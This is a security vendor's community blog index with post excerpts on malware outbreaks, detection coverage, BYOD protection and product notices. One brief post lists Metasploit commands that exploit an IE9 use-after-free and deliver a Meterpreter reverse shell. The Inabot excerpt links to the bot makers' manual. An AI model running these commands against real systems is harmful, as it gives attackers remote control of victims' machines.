Security Community Blog

The Security Community Blog is the perfect place to share short, timely insights including product tips, news and other information relevant to the Security community. Any authenticated Connect member can contribute to this blog.

  • 2
    Created: Brandon Noble 25 Apr 2013

    W32.Inabot - Support Perspective and Battle Plan

    I. BACKGROUND: We have been receiving a few scattered cases of outbreaks from a file labeled snkb00ptz.exe or snkb0ptz.exe, but it seems to be on the rise. It's normally considered poor troubleshooting to use the file name for any type of identification of a threat, but recent examples have made this practical. Even though these files were detected as many different threat names and families (Trojan.gen, w32.IRCBot.NG, Downloader, etc), the cases all reported the same behavior and symptoms. After some additional investigation, Symantec Security Response has broken out detection for W32.Inabot. That's short for the Insomnia IRC bot. More information is available from the makers of this threat in their manual, here: http://pastebin.com/dvpu8Zwb For those of you familiar with W32.Changeup, much of this...
  • 0
    Updated: Duncan Mills 04 Apr 2013

    Using Symantec Protection Suite Enterprise Edition (SPS EE) to protect user-owned tablets and smartphones from Internet threats

    The increased use in the workplace of user-owned devices such as smartphones and tablets, often referred to as bring your own device (BYOD), provides businesses with significant productivity and cost benefits. However, it also presents a number of complex challenges related to security. Due to the rise of smart media devices like smartphones, tablets and ultrabooks, it is estimated that potentially, as many as 30-35%* of endpoints connected to a company’s network could be unmanaged. These are more at risk than managed endpoints which are typically subject to software patching and endpoint security policies. Of course unmanaged endpoints are still protected by your perimeter security, such as secure web gateways. However, these have typically evolved from caching proxies and URL filters. What you need is an additional layer of security that provides the best possible levels of protection for unmanaged endpoints. Symantec Web Gateway (SWG) will...
  • 0
    Updated: Vikram Kumar-SAV to SEP 05 Feb 2013

    Evolving Endpoint Security

      Symantec keeps tabs on the changing threat landscape and incorporates relevant security into its products. The same is the story with SAV to SEP to now SEP 12. When we had SAV in the market, what our customers needed was just an antivirus to protect their systems from downtime. Here antivirus was looked at more as an availability facilitator than a core security product, till early 2000. Even though we had SCS (firewall and IPS), selected people used the other features. Starting from 2006-2007 there was a high rise in malware being created and vulnerabilities being exploited. Slowly the trend changed and it all came down to money-making malware: FakeAntivirus, Downadup, various blackmailing Trojans, etc. Here the audience was not high profile, and SEP 11 very well detects and blocks and does whatever it can. Slowly people started using IPS, ADC and found much more can be done with SEP, and they are doing it. However in last few years there has been...
  • 12
    Updated: Brandon Noble 17 May 2013

    W32.Changeup keeps on giving

    I. BACKGROUND: In mid-2009, W32.Changeup was first discovered on systems around the world. Over the last few years, Symantec Security Response has profiled this threat, explained why it spreads, and shown how it was created. Since November 2012 we have seen weekly spikes in the number of W32.Changeup detections and infections. The increase in detections is a result of a renewed W32.Changeup campaign now active and in-the-wild. II. THREAT DETAILS: When a system is compromised, W32.Changeup may install additional malware. These secondary threats have the ability to download even...
  • 0
    Created: Fabiano.Pessoa 27 Sep 2012

    Vulnerability

    Hello We got a discovered vulnerability in IE 9 on 17/09/2012 which can be exploited as following command in Backtrack 5 R2 Metasploit: - msfupdate - Use exploit / windows / browser / ie_execcommand_uaf - Set SRVHOST 192,168 ... - Set PAYLOAD windows / Meterpreter / reverse_tcp - Set LHOST 192,168 ... - exploit Let's beware the networking. hugs
  • 7
    Updated: Brandon Noble 30 Aug 2012

    Java 0-Day Coverage

    Greetings everyone. We are still getting a lot of questions about Symantec's coverage of the most recent Java 0-Day. I thought I would take a moment to jot down a list of our current coverage for this event, and hopefully save everyone some time and hassle. Current Coverage: 24063 - Web Attack: Malicious Java Download 3 Created prior to the advent of the 0day being used in the wild. This was detecting the Metasploit Exploit Module released for the exploit. 25826 - Web Attack: Blackhole Toolkit Website 30 Also created prior to the 0 Day. This detects BlackHole Toolkits trying to make use of the new vuln as well. ...
  • 0
    Created: Nick Kelly 24 Jul 2011

    Symantec Anti-Virus 10 End-of-Life Announcement.

    Just an FYI if there is still a SAV installation in your environment. Symantec Anti-Virus patch releases and assisted support will be end-of-life next year. For assistance in migrating to SEP, please contact your local account team.  For operating systems and applications not supported by SEP, there are alternative solutions in the Symantec product portfolio that can help protect your environment.   http://www.symantec.com/business/support/index?page=releasedetails&key=51852   SAV 10 original Release Date: 2005-04-27 End of Engineering Support 2012-07-04  (Last date for patch releases) End of Assisted Support 2012-07-04 (Last date to contact support)   Thanks!
  • 0
    Updated: Chad Dupin 01 Jun 2011

    Job Opportunity: Symantec Security Consultant

    ITS Partner is looking to hire a few Symantec Security Consultants / Engineers.   Location West Michigan / Grand Rapids, MI Area. Job Summary This position will be focused on the implementation of Symantec security products within various customer environments. Job responsibilities include assessing customer needs and expectations, designing solutions to meet those needs, and then implementing the design. In addition to these activities the consultant will participate in the sales process (proposal creation, presentations, sales calls, demos, etc.). This position has the opportunity to grow into a leadership role within ITS to help guide and direct the security team. Preferred Technical Qualifications Symantec Endpoint Protection Symantec Endpoint Encryption Symantec Data Loss Prevention Control Compliance Suite PGP Technical Knowledge...
  • 0
    Created: P_K_ 25 Jan 2011

    How is the content downloaded via LU secure?

    How is the content downloaded via LU secure? The LiveUpdate TRI files are downloaded in an archive format. These minitri and livetri.zip files consist of 3 files: liveupdt.sig, liveupdt.grd and liveupdt.tri. GRD and SIG files are used to verify the security and integrity of patches. The mini-tri zip is validated by the GRD file and also authenticated by the SIG file. The guard file uses SHA-1 hash values. For LiveUpdate the protocols that are used are HTTP/FTP server. These live updates are hosted by Akamai. Published using Java Triage and they are signed by Symantec Digital Signing Servers.
  • 0
    Created: UCD4me 05 Jan 2011

    Your opportunity to provide usability feedback about security products

    The User Centered Design (UCD) team here at Symantec exists to help make customer experiences easier, more efficient and more useful for you. Right now, we're ramping up several research projects where we are looking for those in security and compliance with a manager, director or CISO role to give us feedback in the form of short user stories. This should require only a 30-45 minute commitment on the phone to share experiences and points of pain, and this effort is "product agnostic", so as long as you are involved with security, regardless of products used, we'd like to hear from you! If you are interested, please email Kellie Mecham at kellie_mecham@symantec.com to arrange a date and time for the phone interview. We look forward to hearing from you! Best wishes, Kellie